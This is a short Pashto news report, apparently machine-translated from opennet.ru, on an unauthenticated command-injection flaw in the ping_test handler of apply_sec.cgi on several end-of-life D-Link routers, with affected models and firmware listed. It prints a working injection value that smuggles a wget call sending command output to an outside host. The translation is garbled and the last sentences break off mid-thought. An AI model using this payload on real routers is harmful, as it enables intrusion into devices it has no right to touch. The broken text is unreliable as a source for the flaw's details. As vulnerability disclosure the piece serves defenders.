د D-Link بې سیم راوټرونو کې
په زړه پورې ، د فرم ویئر پراختیا کونکو په وینا ، د "ping_test" زنګ باید یوازې د تصدیق وروسته اجرا شي ، مګر په حقیقت کې دا په هر حالت کې ویل کیږي ، پرته لدې چې ویب انٹرفیس ته ننوتل. په ځانګړې توګه، کله چې apply_sec.cgi سکریپټ ته لاسرسی ومومئ او د "action=ping_test" پیرامیټر تیر کړئ، سکریپټ د تصدیق پاڼې ته لیږدول کیږي، مګر په ورته وخت کې د ping_test سره تړلی عمل ترسره کوي. د کوډ اجرا کولو لپاره ، یو بل زیان پخپله په ping_test کې کارول شوی و ، کوم چې د ازموینې لپاره لیږل شوي IP پتې سموالي په سمه توګه چیک کولو پرته د ping افادیت ته زنګ وهي. د مثال په توګه، د ویجټ افادیت ته زنګ وهلو لپاره او د "ایکو 1234" کمانډ پایلې بهرني کوربه ته لیږدولو لپاره، یوازې د "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" پیرامیټر مشخص کړئ. test.test/؟$( echo 1234)"
د زیان مننې شتون په رسمي ډول په لاندې ماډلونو کې تایید شوی:
- DIR-655 د فرم ویئر 3.02b05 یا زاړه سره؛
- DIR-866L د فرم ویئر 1.03b04 یا زاړه سره؛
- DIR-1565 د فرم ویئر 1.01 یا زاړه سره؛
- DIR-652 (د ستونزمن فرم ویئر نسخو په اړه هیڅ معلومات ندي ورکړل شوي)
د دې ماډلونو لپاره د ملاتړ موده لا دمخه پای ته رسیدلې ، نو D-Link
وروسته معلومه شوه چې زیانمنتیا هم وه
سرچینه: opennet.ru